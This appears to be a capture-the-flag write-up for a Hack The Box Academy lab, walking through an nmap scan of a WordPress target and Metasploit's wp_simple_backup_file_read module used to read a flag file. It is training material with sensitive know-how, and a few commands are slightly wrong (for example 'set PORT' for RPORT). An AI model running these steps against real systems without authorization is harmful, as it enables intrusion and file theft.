Getting Started

Public Exploits

One thing that frustrates me a bit when it comes to HTB academy is that it practically forces you to buy the yearly, that way you can actually "learn" how to do the class. Therefore, I figured might as well do some write-ups for anyone who needs help.

Firstly, make sure to spawn the target in, in my case,

Something to note about hackthebox attacks that isn't mentioned within the academy, is that the port number is where the malicious thing is, it's a neat little hint for things like this.

In the previous lessons, it taught us about nmap, however, the first command that should be ran is

sudo nmap -A -p 47782 94.237.58.137

_Side Note, if you want to know the "proper" way to sccan for the ports, just do nmap -sV -sC -p- [Target IP] might take a bit though.

This will do an "aggressive" scan, which basically does all of the following without requiring us to actually put in the command:

• OS Detection (-O): Attempts to identify the operating system running on the target.
• Version Detection (-sV): Probes open ports to determine what specific service and version number are running (e.g., Apache 2.4.41 instead of just "http").
• Script Scanning (-sC): Runs a collection of default Nmap Scripting Engine (NSE) scripts to check for common vulnerabilities or gather more information about services.
• Traceroute (--traceroute): Maps the network path from your machine to the target host.

Additionally, the -p causes the specific port to be scanned.

└──╼ [★]$ sudo nmap -A -p 47782 94.237.58.137
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-19 05:33 CST
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 94-237-58-137.uk-lon1.upcloud.host (94.237.58.137)
Host is up (0.00046s latency).

PORT      STATE SERVICE VERSION
47782/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Getting Started – Just another WordPress site
|_http-generator: WordPress 5.6.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: phone|proxy server|VoIP phone|WAP|general purpose|webcam
Running (JUST GUESSING): Google Android 4.4.X|4.0.X (92%), WebSense embedded (91%), Linux 3.X (91%), Cisco embedded (91%), Linksys embedded (91%), AXIS embedded (89%)
OS CPE: cpe:/o:google:android:4.4.0 cpe:/o:linux:linux_kernel cpe:/h:cisco:cp-dx80 cpe:/o:google:android cpe:/h:linksys:ea3500 cpe:/o:linux:linux_kernel:3 cpe:/o:google:android:4.0.4
Aggressive OS guesses: Android 4.4.0 (92%), Websense Content Gateway (91%), Cisco CP-DX80 collaboration endpoint (Android) (91%), Linksys EA3500 WAP (91%), Linux 3.6 - 3.10 (90%), Axis M3006-V network camera (89%), Android 4.0.4 (Linux 2.6) (89%), Linux 2.6.18 - 2.6.24 (89%), Linux 3.16 (89%), Suga embedded WiFi module (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops

TRACEROUTE (using port 47782/tcp)
HOP RTT     ADDRESS
1   0.13 ms 94.237.48.1
2   0.23 ms 100.69.43.225
3   0.25 ms 172.17.252.33
4   0.25 ms 172.17.252.38
5   0.23 ms 100.69.45.147
6   0.38 ms 94-237-58-137.uk-lon1.upcloud.host (94.237.58.137)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.15 seconds

Here we can see it's "Just Another Wordpress Site". Therefore, if we try to go to the domain:

Now it's time to use metasploit and see what we can do

msfconsole

Next, we need to search for an exploit. rather than trying to be extremely complex and such, let's just look for wordpress and the plugin that's quite literally... on the screen.

search WordPress 2.7.10

From there we will see an output in regards to the exploits, there will only be one.

use exploit/unix/webapp/wp_simple_backup_file_read

Then, like in previous tutorials, we need to see what kind of information we must put in to use the exploit, therefore:

show options

Here we see that we need to set RHOST, RPORT, and FILEPATH. therefore

set RHOST [TARGET IP]
set PORT [TARGET PORT IP]
set FILEPATH flag.txt

afterwards, simply type exploit.

then you can type exit upon execution, and find the file that you requested within your file manager. in my case it was just in the home directory and contained the flag.